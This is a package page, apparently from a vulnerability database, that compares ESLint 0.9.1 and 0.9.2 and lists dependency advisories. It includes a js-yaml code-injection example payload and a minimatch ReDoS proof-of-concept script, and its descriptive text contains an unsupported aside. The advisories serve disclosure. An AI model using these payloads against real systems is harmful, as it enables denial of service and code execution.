ESLint version 0.9.2 is a minor update to the popular JavaScript linting tool, building upon version 0.9.1. Both versions share the same core functionality: providing an Esprima-based pattern checker for JavaScript code, helping developers enforce coding standards and identify potential errors. They depend on the same core set of libraries, including Chalk for colorful terminal output, Escope for scope analysis, Esprima for parsing, and Js-Yaml for handling YAML configuration files. Key developer dependencies like Mocha for testing, Browserify for bundling, and Istanbul for code coverage also remain consistent.
The primary difference between the two versions lies in bug fixes and minor improvements incorporated into version 0.9.2. While retaining the same core dependencies and development tools, this newer iteration offers a more refined experience for users working with JavaScript code. Developers seeking increased stability and the latest refinements should opt for version 0.9.2; since both versions share essentially the same feature set, there isn't a huge incentive to upgrade beyond typical software maintance considerations. Both versions include comprehensive linting capabilities, support for custom rules, and integration with popular editors and build systems ( features that are not stated on the json files but are true).
The MIT license applies to both versions.
All the vulnerabilities related to the version 0.9.2 of the package
Denial of Service in js-yaml
Versions of js-yaml prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service.
Upgrade to version 3.13.0.
Code Injection in js-yaml
Versions of js-yaml prior to 3.13.1 are vulnerable to Code Injection. The load() function may execute arbitrary code injected through a malicious YAML file. Objects that have toString as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the load() function. The safeLoad() function is unaffected.
An example payload is
{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1
which returns the object
{
"1553107949161": 1
}
Upgrade to version 3.13.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.